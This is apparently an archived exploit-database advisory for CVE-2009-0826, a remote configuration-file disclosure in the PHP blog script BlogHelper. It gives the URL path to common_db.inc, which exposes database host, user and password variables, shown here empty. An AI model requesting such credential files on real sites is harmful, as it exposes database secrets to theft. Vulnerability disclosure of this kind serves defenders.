BlogHelper - Remote Configuration File Disclosure

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2009-01-05  
date_updated: 2017-01-12  
verified: 1  
codes: OSVDB-51204;CVE-2009-0826  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7689.txt  
......

  Remote Config File Disclosure
----------------------------------------------------
script: BlogHelper

***************************************************************************
download from:http://www.freedville.com/oss/BlogHelper.zip

***************************************************************************
vul:

www.site.com/path/common_db.inc
................................
  $dbhost = "";
  $dbusername = "";
  $dbuserpass = "";
  $default_dbname = ";
..............................
-------------------------------------------------
-------------------------------------------------
*************************************************

Author: ahmadbady

*************************************************

# milw0rm.com [2009-01-06]